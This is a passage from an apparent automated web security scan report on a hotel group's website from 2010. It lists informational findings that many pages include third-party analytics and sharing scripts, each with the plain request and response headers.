Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /kate-starkey-couture

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /kate-starkey-couture HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, Kate Star
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.43. http://www.redcarnationhotels.com/lloydstsb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /lloydstsb

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lloydstsb HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>LLoyds TSB Premier</title>
<met
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.44. http://www.redcarnationhotels.com/lloydstsb/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /lloydstsb/terms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lloydstsb/terms HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:00:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:00:16 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.45. http://www.redcarnationhotels.com/london-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london-offers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /london-offers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=147d0afef57869fb6da0dff7153a443c;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:21 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=767728f27962f5cd7261ee9a66948e93; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury London Hotel Deals & Off
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.46. http://www.redcarnationhotels.com/london-offers/terms-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london-offers/terms-conditions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /london-offers/terms-conditions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/london-offers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:57:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:57:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.47. http://www.redcarnationhotels.com/london_theatre_break  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london_theatre_break

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /london_theatre_break HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>London Theatre Breaks, Hotel &
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.48. http://www.redcarnationhotels.com/london_weekend_break  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london_weekend_break

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /london_weekend_break HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>London Weekend Breaks, Luxury H
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.49. http://www.redcarnationhotels.com/meet-the-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meet-the-team HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:23:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:23:37 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6b9511053bb709f5070e1fc1a78631e6; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Ho
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.50. http://www.redcarnationhotels.com/meet-the-team/terry-holmes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meet-the-team/terry-holmes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://webcache.googleusercontent.com/search?q=cache:M_vK81JO5OUJ:www.milestonehotel.com/meet-the-team+%40rchmail.com&cd=6&hl=en&ct=clnk&gl=us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terry Holmes, Executive Directo
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.51. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes/career

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meet-the-team/terry-holmes/career HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:51 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terry Holmes, career in hotels<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.52. http://www.redcarnationhotels.com/meetings-and-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/?business
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:57 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.53. http://www.redcarnationhotels.com/meetings-and-events/executive-club  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events/executive-club HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Executive Club - 5 Star London,
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.54. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/apply

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events/executive-club/apply HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:55 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Apply for Red Carnation Hotels
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.55. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/benefits

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events/executive-club/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Benefits of Executive Club Memb
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.56. http://www.redcarnationhotels.com/meetings-and-events/facilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/facilities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events/facilities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Business Meetings Facilities -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.57. http://www.redcarnationhotels.com/meetings-and-events/special-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/special-offers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meetings-and-events/special-offers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Special Offers</title>
<meta ht
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.58. http://www.redcarnationhotels.com/newsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /newsletter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsletter HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Newsletter</title>
<meta http-e
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.59. http://www.redcarnationhotels.com/offers-and-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offers-and-gifts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
